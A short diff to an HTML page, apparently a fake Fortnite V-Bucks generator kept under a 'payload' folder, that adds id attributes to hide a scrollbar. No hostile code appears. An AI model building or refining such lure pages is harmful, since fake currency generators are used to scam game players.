Adding hiding scrollbar:

--- a/payload/vbucks/src/index.html
+++ b/payload/vbucks/src/index.html
@@ -23,9 +23,9 @@
 
     </head>
    
-   <body>
+   <body id="parent">
         <div id="title_bar"></div>
-        <div class="layout">
+        <div class="layout" id="child">
             <div class="generator-wrap1" >
                 <div class="fortnite-wrap col-lg-6 center-block">
                     <div class="title-wrap text-center">
